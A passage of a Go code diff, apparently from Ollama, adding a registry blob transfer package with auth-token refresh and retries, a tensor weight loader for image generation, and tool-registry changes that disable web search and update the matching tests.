switch resp.StatusCode {
|
||||
case http.StatusOK:
|
||||
return u, nil
|
||||
case http.StatusUnauthorized:
|
||||
if d.getToken == nil {
|
||||
return nil, fmt.Errorf("unauthorized")
|
||||
}
|
||||
ch := parseAuthChallenge(resp.Header.Get("WWW-Authenticate"))
|
||||
if *d.token, err = d.getToken(ctx, ch); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
case http.StatusTemporaryRedirect, http.StatusFound, http.StatusMovedPermanently:
|
||||
loc, _ := resp.Location()
|
||||
if loc.Host != u.Host {
|
||||
return loc, nil
|
||||
}
|
||||
u = loc
|
||||
default:
|
||||
return nil, fmt.Errorf("status %d", resp.StatusCode)
|
||||
}
|
||||
}
|
||||
return nil, fmt.Errorf("too many redirects")
|
||||
}
|
||||
|
||||
type speedTracker struct {
|
||||
mu sync.Mutex
|
||||
speeds []float64
|
||||
}
|
||||
|
||||
func (s *speedTracker) record(v float64) {
|
||||
s.mu.Lock()
|
||||
s.speeds = append(s.speeds, v)
|
||||
if len(s.speeds) > 30 {
|
||||
s.speeds = s.speeds[1:]
|
||||
}
|
||||
s.mu.Unlock()
|
||||
}
|
||||
|
||||
func (s *speedTracker) median() float64 {
|
||||
s.mu.Lock()
|
||||
defer s.mu.Unlock()
|
||||
if len(s.speeds) < 5 {
|
||||
return 0
|
||||
}
|
||||
sorted := make([]float64, len(s.speeds))
|
||||
copy(sorted, s.speeds)
|
||||
slices.Sort(sorted)
|
||||
return sorted[len(sorted)/2]
|
||||
}
|
||||
|
||||
const defaultStallTimeout = 10 * time.Second
|
||||
12
x/imagegen/transfer/sparse_other.go
Normal file
12
x/imagegen/transfer/sparse_other.go
Normal file
@@ -0,0 +1,12 @@
|
||||
//go:build !windows
|
||||
|
||||
package transfer
|
||||
|
||||
import "os"
|
||||
|
||||
// setSparse is a no-op on non-Windows platforms.
|
||||
// On Windows, this sets the FSCTL_SET_SPARSE attribute which allows the OS
|
||||
// to not allocate disk blocks for zero-filled regions. This is useful for
|
||||
// partial downloads where not all data has been written yet. On Unix-like
|
||||
// systems, filesystems typically handle this automatically (sparse by default).
|
||||
func setSparse(_ *os.File) {}
|
||||
31
x/imagegen/transfer/sparse_windows.go
Normal file
31
x/imagegen/transfer/sparse_windows.go
Normal file
@@ -0,0 +1,31 @@
|
||||
//go:build windows
|
||||
|
||||
package transfer
|
||||
|
||||
import (
|
||||
"os"
|
||||
|
||||
"golang.org/x/sys/windows"
|
||||
)
|
||||
|
||||
// setSparse sets the FSCTL_SET_SPARSE attribute on Windows files.
|
||||
// This allows the OS to not allocate disk blocks for zero-filled regions,
|
||||
// which is useful for large files that may not be fully written (e.g., partial
|
||||
// downloads). Without this, Windows may pre-allocate disk space for the full
|
||||
// file size even if most of it is zeros.
|
||||
//
|
||||
// Note: Errors are intentionally ignored because:
|
||||
// 1. The file will still work correctly without sparse support
|
||||
// 2. Not all Windows filesystems support sparse files (e.g., FAT32)
|
||||
// 3. This is an optimization, not a requirement
|
||||
func setSparse(file *os.File) {
|
||||
var bytesReturned uint32
|
||||
_ = windows.DeviceIoControl(
|
||||
windows.Handle(file.Fd()),
|
||||
windows.FSCTL_SET_SPARSE,
|
||||
nil, 0,
|
||||
nil, 0,
|
||||
&bytesReturned,
|
||||
nil,
|
||||
)
|
||||
}
|
||||
218
x/imagegen/transfer/transfer.go
Normal file
218
x/imagegen/transfer/transfer.go
Normal file
@@ -0,0 +1,218 @@
|
||||
// Package transfer provides minimal, fast blob transfer for tensor-based models.
|
||||
//
|
||||
// This package is in x/ because the tensor model storage format is under development.
|
||||
// It provides optimized transfer for models with many small blobs (tensor models)
|
||||
// rather than few large blobs (typical LLMs).
|
||||
//
|
||||
// TODO (jmorganca): Integrate into server/download.go and server/upload.go when stable.
|
||||
//
|
||||
// Design Philosophy:
|
||||
// This package is intentionally simpler than the main server's download/upload code.
|
||||
// Key simplifications for many-small-blob workloads:
|
||||
//
|
||||
// - Whole-blob transfers: No part-based chunking. Each blob downloads/uploads as one unit.
|
||||
// - No resume: If a transfer fails, it restarts from scratch (fine for small blobs).
|
||||
// - Inline hashing: SHA256 computed during streaming, not asynchronously after parts complete.
|
||||
// - Stall and speed detection: Cancels on no data (stall) or speed below 10% of median.
|
||||
//
|
||||
// For large models (multi-GB), use the server's download/upload code which has:
|
||||
// - Part-based transfers with 64MB chunks
|
||||
// - Resumable downloads with JSON state files
|
||||
// - Async streamHasher that hashes from OS page cache as parts complete
|
||||
// - Speed tracking with rolling median to detect and restart slow parts
|
||||
package transfer
|
||||
|
||||
import (
|
||||
"context"
|
||||
"errors"
|
||||
"log/slog"
|
||||
"math/rand/v2"
|
||||
"net/http"
|
||||
"strings"
|
||||
"sync/atomic"
|
||||
"time"
|
||||
)
|
||||
|
||||
// Blob represents a content-addressed blob to transfer.
|
||||
type Blob struct {
|
||||
Digest string // sha256:...
|
||||
Size int64
|
||||
|
||||
// From enables cross-repository blob mounting (upload only).
|
||||
// When set, the upload will first attempt to mount the blob from this source
|
||||
// repository instead of uploading the data. This is a Docker Registry v2 API
|
||||
// feature that avoids re-uploading blobs that already exist elsewhere.
|
||||
//
|
||||
// Example: From="library/source-model" will add ?mount=<digest>&from=library/source-model
|
||||
// to the POST /blobs/uploads/ request. If the registry returns 201 Created,
|
||||
// the blob was mounted successfully and no upload is needed.
|
||||
//
|
||||
// See: https://distribution.github.io/distribution/spec/api/#cross-repository-blob-mount
|
||||
From string
|
||||
}
|
||||
|
||||
// DownloadOptions configures a parallel download operation.
|
||||
type DownloadOptions struct {
|
||||
Blobs []Blob // Blobs to download
|
||||
BaseURL string // Registry base URL
|
||||
DestDir string // Destination directory for blobs
|
||||
Repository string // Repository path for blob URLs (e.g., "library/model")
|
||||
Concurrency int // Max parallel downloads (default 64)
|
||||
Progress func(completed, total int64) // Progress callback (optional)
|
||||
Client *http.Client // HTTP client (optional, uses default)
|
||||
Token string // Auth token (optional)
|
||||
GetToken func(ctx context.Context, challenge AuthChallenge) (string, error) // Token refresh callback
|
||||
Logger *slog.Logger // Optional structured logger
|
||||
UserAgent string // User-Agent header (optional, has default)
|
||||
StallTimeout time.Duration // Timeout for stall detection (default 10s)
|
||||
}
|
||||
|
||||
// UploadOptions configures a parallel upload operation.
|
||||
type UploadOptions struct {
|
||||
Blobs []Blob // Blobs to upload
|
||||
BaseURL string // Registry base URL
|
||||
SrcDir string // Source directory containing blobs
|
||||
Concurrency int // Max parallel uploads (default 32)
|
||||
Progress func(completed, total int64) // Progress callback (optional)
|
||||
Client *http.Client // HTTP client (optional, uses default)
|
||||
Token string // Auth token (optional)
|
||||
GetToken func(ctx context.Context, challenge AuthChallenge) (string, error) // Token refresh callback
|
||||
Logger *slog.Logger // Optional structured logger
|
||||
UserAgent string // User-Agent header (optional, has default)
|
||||
|
||||
// Manifest fields (optional) - if set, manifest is pushed after all blobs complete
|
||||
Manifest []byte // Raw manifest JSON to push
|
||||
ManifestRef string // Tag or digest for the manifest (e.g., "latest", "sha256:...")
|
||||
Repository string // Repository path for manifest URL (e.g., "library/model")
|
||||
}
|
||||
|
||||
// AuthChallenge represents a parsed WWW-Authenticate challenge.
|
||||
type AuthChallenge struct {
|
||||
Realm string
|
||||
Service string
|
||||
Scope string
|
||||
}
|
||||
|
||||
// Default concurrency limits and settings
|
||||
const (
|
||||
DefaultDownloadConcurrency = 64
|
||||
DefaultUploadConcurrency = 32
|
||||
maxRetries = 6
|
||||
defaultUserAgent = "ollama-transfer/1.0"
|
||||
)
|
||||
|
||||
var errMaxRetriesExceeded = errors.New("max retries exceeded")
|
||||
|
||||
// defaultClient is a shared HTTP client with connection pooling.
|
||||
var defaultClient = &http.Client{
|
||||
Transport: &http.Transport{
|
||||
MaxIdleConns: 100,
|
||||
MaxIdleConnsPerHost: 100,
|
||||
IdleConnTimeout: 90 * time.Second,
|
||||
},
|
||||
Timeout: 5 * time.Minute,
|
||||
// Don't follow redirects automatically - we handle them manually
|
||||
CheckRedirect: func(req *http.Request, via []*http.Request) error {
|
||||
return http.ErrUseLastResponse
|
||||
},
|
||||
}
|
||||
|
||||
// progressTracker aggregates progress across concurrent operations.
|
||||
type progressTracker struct {
|
||||
completed atomic.Int64
|
||||
total int64
|
||||
callback func(completed, total int64)
|
||||
}
|
||||
|
||||
func newProgressTracker(total int64, callback func(completed, total int64)) *progressTracker {
|
||||
return &progressTracker{
|
||||
total: total,
|
||||
callback: callback,
|
||||
}
|
||||
}
|
||||
|
||||
func (p *progressTracker) add(n int64) {
|
||||
if p == nil || p.callback == nil {
|
||||
return
|
||||
}
|
||||
completed := p.completed.Add(n)
|
||||
p.callback(completed, p.total)
|
||||
}
|
||||
|
||||
// Download downloads blobs in parallel with streaming hash verification.
|
||||
func Download(ctx context.Context, opts DownloadOptions) error {
|
||||
return download(ctx, opts)
|
||||
}
|
||||
|
||||
// Upload uploads blobs in parallel.
|
||||
func Upload(ctx context.Context, opts UploadOptions) error {
|
||||
return upload(ctx, opts)
|
||||
}
|
||||
|
||||
// digestToPath converts sha256:abc123 to sha256-abc123
|
||||
func digestToPath(digest string) string {
|
||||
if len(digest) > 7 && digest[6] == ':' {
|
||||
return digest[:6] + "-" + digest[7:]
|
||||
}
|
||||
return digest
|
||||
}
|
||||
|
||||
// parseAuthChallenge parses a WWW-Authenticate header value.
|
||||
// Example: Bearer realm="https://auth.example.com",service="registry",scope="repository:foo:pull"
|
||||
func parseAuthChallenge(header string) AuthChallenge {
|
||||
header = strings.TrimPrefix(header, "Bearer ")
|
||||
|
||||
getValue := func(key string) string {
|
||||
startIdx := strings.Index(header, key+"=")
|
||||
if startIdx == -1 {
|
||||
return ""
|
||||
}
|
||||
startIdx += len(key) + 1
|
||||
if startIdx >= len(header) {
|
||||
return ""
|
||||
}
|
||||
|
||||
// Handle quoted values
|
||||
if header[startIdx] == '"' {
|
||||
startIdx++
|
||||
endIdx := strings.Index(header[startIdx:], "\"")
|
||||
if endIdx == -1 {
|
||||
return header[startIdx:]
|
||||
}
|
||||
return header[startIdx : startIdx+endIdx]
|
||||
}
|
||||
|
||||
// Unquoted value - ends at comma or end of string
|
||||
endIdx := strings.Index(header[startIdx:], ",")
|
||||
if endIdx == -1 {
|
||||
return header[startIdx:]
|
||||
}
|
||||
return header[startIdx : startIdx+endIdx]
|
||||
}
|
||||
|
||||
return AuthChallenge{
|
||||
Realm: getValue("realm"),
|
||||
Service: getValue("service"),
|
||||
Scope: getValue("scope"),
|
||||
}
|
||||
}
|
||||
|
||||
// backoff returns a function that sleeps with exponential backoff.
|
||||
func backoff(ctx context.Context, attempt int, maxBackoff time.Duration) error {
|
||||
if ctx.Err() != nil {
|
||||
return ctx.Err()
|
||||
}
|
||||
|
||||
// n^2 backoff with jitter
|
||||
d := min(time.Duration(attempt*attempt)*10*time.Millisecond, maxBackoff)
|
||||
d = time.Duration(float64(d) * (rand.Float64() + 0.5))
|
||||
|
||||
t := time.NewTimer(d)
|
||||
defer t.Stop()
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return ctx.Err()
|
||||
case <-t.C:
|
||||
return nil
|
||||
}
|
||||
}
|
||||
1700
x/imagegen/transfer/transfer_test.go
Normal file
1700
x/imagegen/transfer/transfer_test.go
Normal file
File diff suppressed because it is too large
Load Diff
346
x/imagegen/transfer/upload.go
Normal file
346
x/imagegen/transfer/upload.go
Normal file
@@ -0,0 +1,346 @@
|
||||
package transfer
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"cmp"
|
||||
"context"
|
||||
"errors"
|
||||
"fmt"
|
||||
"io"
|
||||
"log/slog"
|
||||
"net/http"
|
||||
"net/url"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"time"
|
||||
|
||||
"golang.org/x/sync/errgroup"
|
||||
"golang.org/x/sync/semaphore"
|
||||
)
|
||||
|
||||
type uploader struct {
|
||||
client *http.Client
|
||||
baseURL string
|
||||
srcDir string
|
||||
repository string // Repository path for blob URLs (e.g., "library/model")
|
||||
token *string
|
||||
getToken func(context.Context, AuthChallenge) (string, error)
|
||||
userAgent string
|
||||
progress *progressTracker
|
||||
logger *slog.Logger
|
||||
}
|
||||
|
||||
func upload(ctx context.Context, opts UploadOptions) error {
|
||||
if len(opts.Blobs) == 0 && len(opts.Manifest) == 0 {
|
||||
return nil
|
||||
}
|
||||
|
||||
token := opts.Token
|
||||
u := &uploader{
|
||||
client: cmp.Or(opts.Client, defaultClient),
|
||||
baseURL: opts.BaseURL,
|
||||
srcDir: opts.SrcDir,
|
||||
repository: cmp.Or(opts.Repository, "library/_"),
|
||||
token: &token,
|
||||
getToken: opts.GetToken,
|
||||
userAgent: cmp.Or(opts.UserAgent, defaultUserAgent),
|
||||
logger: opts.Logger,
|
||||
}
|
||||
|
||||
if len(opts.Blobs) > 0 {
|
||||
// Phase 1: Fast parallel HEAD checks to find which blobs need uploading
|
||||
needsUpload := make([]bool, len(opts.Blobs))
|
||||
{
|
||||
sem := semaphore.NewWeighted(128) // High concurrency for HEAD checks
|
||||
g, gctx := errgroup.WithContext(ctx)
|
||||
for i, blob := range opts.Blobs {
|
||||
g.Go(func() error {
|
||||
if err := sem.Acquire(gctx, 1); err != nil {
|
||||
return err
|
||||
}
|
||||
defer sem.Release(1)
|
||||
exists, err := u.exists(gctx, blob)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if !exists {
|
||||
needsUpload[i] = true
|
||||
} else if u.logger != nil {
|
||||
u.logger.Debug("blob exists", "digest", blob.Digest)
|
||||
}
|
||||
return nil
|
||||
})
|
||||
}
|
||||
if err := g.Wait(); err != nil {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
||||
// Filter to only blobs that need uploading
|
||||
var toUpload []Blob
|
||||
var total int64
|
||||
for i, blob := range opts.Blobs {
|
||||
if needsUpload[i] {
|
||||
toUpload = append(toUpload, blob)
|
||||
total += blob.Size
|
||||
}
|
||||
}
|
||||
|
||||
if len(toUpload) == 0 {
|
||||
if u.logger != nil {
|
||||
u.logger.Debug("all blobs exist, nothing to upload")
|
||||
}
|
||||
} else {
|
||||
// Phase 2: Upload blobs that don't exist
|
||||
u.progress = newProgressTracker(total, opts.Progress)
|
||||
concurrency := cmp.Or(opts.Concurrency, DefaultUploadConcurrency)
|
||||
sem := semaphore.NewWeighted(int64(concurrency))
|
||||
|
||||
g, gctx := errgroup.WithContext(ctx)
|
||||
for _, blob := range toUpload {
|
||||
g.Go(func() error {
|
||||
if err := sem.Acquire(gctx, 1); err != nil {
|
||||
return err
|
||||
}
|
||||
defer sem.Release(1)
|
||||
return u.upload(gctx, blob)
|
||||
})
|
||||
}
|
||||
if err := g.Wait(); err != nil {
|
||||
return err
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if len(opts.Manifest) > 0 && opts.ManifestRef != "" && opts.Repository != "" {
|
||||
return u.pushManifest(ctx, opts.Repository, opts.ManifestRef, opts.Manifest)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (u *uploader) upload(ctx context.Context, blob Blob) error {
|
||||
var lastErr error
|
||||
var n int64
|
||||
|
||||
for attempt := range maxRetries {
|
||||
if attempt > 0 {
|
||||
if err := backoff(ctx, attempt, time.Second<<uint(attempt-1)); err != nil {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
||||
var err error
|
||||
n, err = u.uploadOnce(ctx, blob)
|
||||
if err == nil {
|
||||
return nil
|
||||
}
|
||||
|
||||
if errors.Is(err, context.Canceled) || errors.Is(err, context.DeadlineExceeded) {
|
||||
return err
|
||||
}
|
||||
|
||||
u.progress.add(-n)
|
||||
lastErr = err
|
||||
}
|
||||
return fmt.Errorf("%w: %v", errMaxRetriesExceeded, lastErr)
|
||||
}
|
||||
|
||||
func (u *uploader) uploadOnce(ctx context.Context, blob Blob) (int64, error) {
|
||||
if u.logger != nil {
|
||||
u.logger.Debug("uploading blob", "digest", blob.Digest, "size", blob.Size)
|
||||
}
|
||||
|
||||
// Init upload
|
||||
uploadURL, err := u.initUpload(ctx, blob)
|
||||
if err != nil {
|
||||
return 0, err
|
||||
}
|
||||
|
||||
// Open file
|
||||
f, err := os.Open(filepath.Join(u.srcDir, digestToPath(blob.Digest)))
|
||||
if err != nil {
|
||||
return 0, err
|
||||
}
|
||||
defer f.Close()
|
||||
|
||||
// PUT blob
|
||||
return u.put(ctx, uploadURL, f, blob.Size)
|
||||
}
|
||||
|
||||
func (u *uploader) exists(ctx context.Context, blob Blob) (bool, error) {
|
||||
req, _ := http.NewRequestWithContext(ctx, http.MethodHead, fmt.Sprintf("%s/v2/%s/blobs/%s", u.baseURL, u.repository, blob.Digest), nil)
|
||||
req.Header.Set("User-Agent", u.userAgent)
|
||||
if *u.token != "" {
|
||||
req.Header.Set("Authorization", "Bearer "+*u.token)
|
||||
}
|
||||
|
||||
resp, err := u.client.Do(req)
|
||||
if err != nil {
|
||||
return false, err
|
||||
}
|
||||
resp.Body.Close()
|
||||
|
||||
if resp.StatusCode == http.StatusUnauthorized && u.getToken != nil {
|
||||
ch := parseAuthChallenge(resp.Header.Get("WWW-Authenticate"))
|
||||
if *u.token, err = u.getToken(ctx, ch); err != nil {
|
||||
return false, err
|
||||
}
|
||||
return u.exists(ctx, blob)
|
||||
}
|
||||
|
||||
return resp.StatusCode == http.StatusOK, nil
|
||||
}
|
||||
|
||||
func (u *uploader) initUpload(ctx context.Context, blob Blob) (string, error) {
|
||||
endpoint, _ := url.Parse(fmt.Sprintf("%s/v2/%s/blobs/uploads/", u.baseURL, u.repository))
|
||||
q := endpoint.Query()
|
||||
q.Set("digest", blob.Digest)
|
||||
endpoint.RawQuery = q.Encode()
|
||||
|
||||
req, _ := http.NewRequestWithContext(ctx, http.MethodPost, endpoint.String(), nil)
|
||||
req.Header.Set("User-Agent", u.userAgent)
|
||||
if *u.token != "" {
|
||||
req.Header.Set("Authorization", "Bearer "+*u.token)
|
||||
}
|
||||
|
||||
resp, err := u.client.Do(req)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
resp.Body.Close()
|
||||
|
||||
if resp.StatusCode == http.StatusUnauthorized && u.getToken != nil {
|
||||
ch := parseAuthChallenge(resp.Header.Get("WWW-Authenticate"))
|
||||
if *u.token, err = u.getToken(ctx, ch); err != nil {
|
||||
return "", err
|
||||
}
|
||||
return u.initUpload(ctx, blob)
|
||||
}
|
||||
|
||||
if resp.StatusCode != http.StatusAccepted {
|
||||
return "", fmt.Errorf("init: status %d", resp.StatusCode)
|
||||
}
|
||||
|
||||
loc := resp.Header.Get("Docker-Upload-Location")
|
||||
if loc == "" {
|
||||
loc = resp.Header.Get("Location")
|
||||
}
|
||||
if loc == "" {
|
||||
return "", fmt.Errorf("no upload location")
|
||||
}
|
||||
|
||||
locURL, _ := url.Parse(loc)
|
||||
if !locURL.IsAbs() {
|
||||
base, _ := url.Parse(u.baseURL)
|
||||
locURL = base.ResolveReference(locURL)
|
||||
}
|
||||
q = locURL.Query()
|
||||
q.Set("digest", blob.Digest)
|
||||
locURL.RawQuery = q.Encode()
|
||||
|
||||
return locURL.String(), nil
|
||||
}
|
||||
|
||||
func (u *uploader) put(ctx context.Context, uploadURL string, f *os.File, size int64) (int64, error) {
|
||||
pr := &progressReader{reader: f, tracker: u.progress}
|
||||
|
||||
req, _ := http.NewRequestWithContext(ctx, http.MethodPut, uploadURL, pr)
|
||||
req.ContentLength = size
|
||||
req.Header.Set("Content-Type", "application/octet-stream")
|
||||
req.Header.Set("User-Agent", u.userAgent)
|
||||
if *u.token != "" {
|
||||
req.Header.Set("Authorization", "Bearer "+*u.token)
|
||||
}
|
||||
|
||||
resp, err := u.client.Do(req)
|
||||
if err != nil {
|
||||
return pr.n, err
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
|
||||
// Handle auth retry
|
||||
if resp.StatusCode == http.StatusUnauthorized && u.getToken != nil {
|
||||
ch := parseAuthChallenge(resp.Header.Get("WWW-Authenticate"))
|
||||
if *u.token, err = u.getToken(ctx, ch); err != nil {
|
||||
return pr.n, err
|
||||
}
|
||||
f.Seek(0, 0)
|
||||
u.progress.add(-pr.n)
|
||||
return u.put(ctx, uploadURL, f, size)
|
||||
}
|
||||
|
||||
// Handle redirect to CDN
|
||||
if resp.StatusCode == http.StatusTemporaryRedirect {
|
||||
loc, _ := resp.Location()
|
||||
f.Seek(0, 0)
|
||||
u.progress.add(-pr.n)
|
||||
pr2 := &progressReader{reader: f, tracker: u.progress}
|
||||
|
||||
req2, _ := http.NewRequestWithContext(ctx, http.MethodPut, loc.String(), pr2)
|
||||
req2.ContentLength = size
|
||||
req2.Header.Set("Content-Type", "application/octet-stream")
|
||||
req2.Header.Set("User-Agent", u.userAgent)
|
||||
|
||||
resp2, err := u.client.Do(req2)
|
||||
if err != nil {
|
||||
return pr2.n, err
|
||||
}
|
||||
defer resp2.Body.Close()
|
||||
|
||||
if resp2.StatusCode != http.StatusCreated && resp2.StatusCode != http.StatusAccepted {
|
||||
body, _ := io.ReadAll(resp2.Body)
|
||||
return pr2.n, fmt.Errorf("status %d: %s", resp2.StatusCode, body)
|
||||
}
|
||||
return pr2.n, nil
|
||||
}
|
||||
|
||||
if resp.StatusCode != http.StatusCreated && resp.StatusCode != http.StatusAccepted {
|
||||
body, _ := io.ReadAll(resp.Body)
|
||||
return pr.n, fmt.Errorf("status %d: %s", resp.StatusCode, body)
|
||||
}
|
||||
return pr.n, nil
|
||||
}
|
||||
|
||||
func (u *uploader) pushManifest(ctx context.Context, repo, ref string, manifest []byte) error {
|
||||
req, _ := http.NewRequestWithContext(ctx, http.MethodPut, fmt.Sprintf("%s/v2/%s/manifests/%s", u.baseURL, repo, ref), bytes.NewReader(manifest))
|
||||
req.Header.Set("Content-Type", "application/vnd.docker.distribution.manifest.v2+json")
|
||||
req.Header.Set("User-Agent", u.userAgent)
|
||||
if *u.token != "" {
|
||||
req.Header.Set("Authorization", "Bearer "+*u.token)
|
||||
}
|
||||
|
||||
resp, err := u.client.Do(req)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
|
||||
if resp.StatusCode == http.StatusUnauthorized && u.getToken != nil {
|
||||
ch := parseAuthChallenge(resp.Header.Get("WWW-Authenticate"))
|
||||
if *u.token, err = u.getToken(ctx, ch); err != nil {
|
||||
return err
|
||||
}
|
||||
return u.pushManifest(ctx, repo, ref, manifest)
|
||||
}
|
||||
|
||||
if resp.StatusCode != http.StatusCreated && resp.StatusCode != http.StatusOK {
|
||||
body, _ := io.ReadAll(resp.Body)
|
||||
return fmt.Errorf("status %d: %s", resp.StatusCode, body)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
type progressReader struct {
|
||||
reader io.Reader
|
||||
tracker *progressTracker
|
||||
n int64
|
||||
}
|
||||
|
||||
func (r *progressReader) Read(p []byte) (int, error) {
|
||||
n, err := r.reader.Read(p)
|
||||
if n > 0 {
|
||||
r.n += int64(n)
|
||||
r.tracker.add(int64(n))
|
||||
}
|
||||
return n, err
|
||||
}
|
||||
116
x/imagegen/weights.go
Normal file
116
x/imagegen/weights.go
Normal file
@@ -0,0 +1,116 @@
|
||||
//go:build mlx
|
||||
|
||||
package imagegen
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"sort"
|
||||
"strings"
|
||||
|
||||
"github.com/ollama/ollama/x/imagegen/mlx"
|
||||
)
|
||||
|
||||
// ManifestWeights provides fast weight loading from tensor blobs.
|
||||
// Uses native mmap loading with synthetic safetensors headers for zero-copy.
|
||||
type ManifestWeights struct {
|
||||
manifest *ModelManifest
|
||||
component string
|
||||
tensors map[string]ManifestLayer // name -> layer
|
||||
cache map[string]*mlx.Array // name -> loaded array
|
||||
nativeCache []*mlx.SafetensorsFile // keep native handles alive
|
||||
}
|
||||
|
||||
// LoadWeightsFromManifest creates a weight loader for a component from manifest storage.
|
||||
func LoadWeightsFromManifest(manifest *ModelManifest, component string) (*ManifestWeights, error) {
|
||||
layers := manifest.GetTensorLayers(component)
|
||||
if len(layers) == 0 {
|
||||
return nil, fmt.Errorf("no tensor layers found for component %q", component)
|
||||
}
|
||||
|
||||
// Strip component prefix from tensor names for model loading
|
||||
// e.g., "text_encoder/model.embed_tokens.weight" -> "model.embed_tokens.weight"
|
||||
prefix := component + "/"
|
||||
tensors := make(map[string]ManifestLayer, len(layers))
|
||||
for _, layer := range layers {
|
||||
tensorName := strings.TrimPrefix(layer.Name, prefix)
|
||||
tensors[tensorName] = layer
|
||||
}
|
||||
|
||||
return &ManifestWeights{
|
||||
manifest: manifest,
|
||||
component: component,
|
||||
tensors: tensors,
|
||||
cache: make(map[string]*mlx.Array),
|
||||
}, nil
|
||||
}
|
||||
|
||||
// Load loads all tensor blobs using native mmap (zero-copy).
|
||||
// Blobs are stored in safetensors format for native mlx_load_safetensors mmap.
|
||||
// If dtype is non-zero, tensors are converted to the specified dtype.
|
||||
func (mw *ManifestWeights) Load(dtype mlx.Dtype) error {
|
||||
for name, layer := range mw.tensors {
|
||||
path := mw.manifest.BlobPath(layer.Digest)
|
||||
|
||||
// Load blob as safetensors (native mmap, zero-copy)
|
||||
sf, err := mlx.LoadSafetensorsNative(path)
|
||||
if err != nil {
|
||||
return fmt.Errorf("load %s: %w", name, err)
|
||||
}
|
||||
|
||||
// Blob contains single tensor named "data"
|
||||
arr := sf.Get("data")
|
||||
if arr == nil {
|
||||
sf.Free()
|
||||
return fmt.Errorf("tensor 'data' not found in blob for %s", name)
|
||||
}
|
||||
|
||||
// Convert dtype if needed
|
||||
if dtype != 0 && arr.Dtype() != dtype {
|
||||
arr = mlx.AsType(arr, dtype)
|
||||
}
|
||||
// ALWAYS make a contiguous copy to ensure independence from mmap
|
||||
arr = mlx.Contiguous(arr)
|
||||
mlx.Eval(arr)
|
||||
mw.cache[name] = arr
|
||||
sf.Free() // Safe to free - arr is now an independent copy
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// GetTensor returns a tensor from cache. Call Load() first.
|
||||
func (mw *ManifestWeights) GetTensor(name string) (*mlx.Array, error) {
|
||||
if mw.cache == nil {
|
||||
return nil, fmt.Errorf("cache not initialized: call Load() first")
|
||||
}
|
||||
arr, ok := mw.cache[name]
|
||||
if !ok {
|
||||
return nil, fmt.Errorf("tensor %q not found", name)
|
||||
}
|
||||
return arr, nil
|
||||
}
|
||||
|
||||
// ListTensors returns all tensor names in sorted order.
|
||||
func (mw *ManifestWeights) ListTensors() []string {
|
||||
names := make([]string, 0, len(mw.tensors))
|
||||
for name := range mw.tensors {
|
||||
names = append(names, name)
|
||||
}
|
||||
sort.Strings(names)
|
||||
return names
|
||||
}
|
||||
|
||||
// HasTensor checks if a tensor exists.
|
||||
func (mw *ManifestWeights) HasTensor(name string) bool {
|
||||
_, ok := mw.tensors[name]
|
||||
return ok
|
||||
}
|
||||
|
||||
// ReleaseAll frees all native handles and clears the tensor cache.
|
||||
func (mw *ManifestWeights) ReleaseAll() {
|
||||
for _, sf := range mw.nativeCache {
|
||||
sf.Free()
|
||||
}
|
||||
mw.nativeCache = nil
|
||||
mw.cache = nil
|
||||
}
|
||||
@@ -38,6 +38,22 @@ func (r *Registry) Register(tool Tool) {
|
||||
r.tools[tool.Name()] = tool
|
||||
}
|
||||
|
||||
// Unregister removes a tool from the registry by name.
|
||||
func (r *Registry) Unregister(name string) {
|
||||
delete(r.tools, name)
|
||||
}
|
||||
|
||||
// Has checks if a tool with the given name is registered.
|
||||
func (r *Registry) Has(name string) bool {
|
||||
_, ok := r.tools[name]
|
||||
return ok
|
||||
}
|
||||
|
||||
// RegisterBash adds the bash tool to the registry.
|
||||
func (r *Registry) RegisterBash() {
|
||||
r.Register(&BashTool{})
|
||||
}
|
||||
|
||||
// Get retrieves a tool by name.
|
||||
func (r *Registry) Get(name string) (Tool, bool) {
|
||||
tool, ok := r.tools[name]
|
||||
@@ -94,9 +110,10 @@ func (r *Registry) Count() int {
|
||||
// - OLLAMA_AGENT_DISABLE_BASH=1 disables bash
|
||||
func DefaultRegistry() *Registry {
|
||||
r := NewRegistry()
|
||||
if os.Getenv("OLLAMA_AGENT_DISABLE_WEBSEARCH") == "" {
|
||||
r.Register(&WebSearchTool{})
|
||||
}
|
||||
// TODO(parthsareen): re-enable web search once it's ready for release
|
||||
// if os.Getenv("OLLAMA_AGENT_DISABLE_WEBSEARCH") == "" {
|
||||
// r.Register(&WebSearchTool{})
|
||||
// }
|
||||
if os.Getenv("OLLAMA_AGENT_DISABLE_BASH") == "" {
|
||||
r.Register(&BashTool{})
|
||||
}
|
||||
|
||||
@@ -93,19 +93,14 @@ func TestRegistry_Execute(t *testing.T) {
|
||||
func TestDefaultRegistry(t *testing.T) {
|
||||
r := DefaultRegistry()
|
||||
|
||||
if r.Count() != 2 {
|
||||
t.Errorf("expected 2 tools in default registry, got %d", r.Count())
|
||||
if r.Count() != 1 {
|
||||
t.Errorf("expected 1 tool in default registry, got %d", r.Count())
|
||||
}
|
||||
|
||||
_, ok := r.Get("bash")
|
||||
if !ok {
|
||||
t.Error("expected bash tool in default registry")
|
||||
}
|
||||
|
||||
_, ok = r.Get("web_search")
|
||||
if !ok {
|
||||
t.Error("expected web_search tool in default registry")
|
||||
}
|
||||
}
|
||||
|
||||
func TestDefaultRegistry_DisableWebsearch(t *testing.T) {
|
||||
@@ -133,18 +128,8 @@ func TestDefaultRegistry_DisableBash(t *testing.T) {
|
||||
|
||||
r := DefaultRegistry()
|
||||
|
||||
if r.Count() != 1 {
|
||||
t.Errorf("expected 1 tool with bash disabled, got %d", r.Count())
|
||||
}
|
||||
|
||||
_, ok := r.Get("web_search")
|
||||
if !ok {
|
||||
t.Error("expected web_search tool in registry")
|
||||
}
|
||||
|
||||
_, ok = r.Get("bash")
|
||||
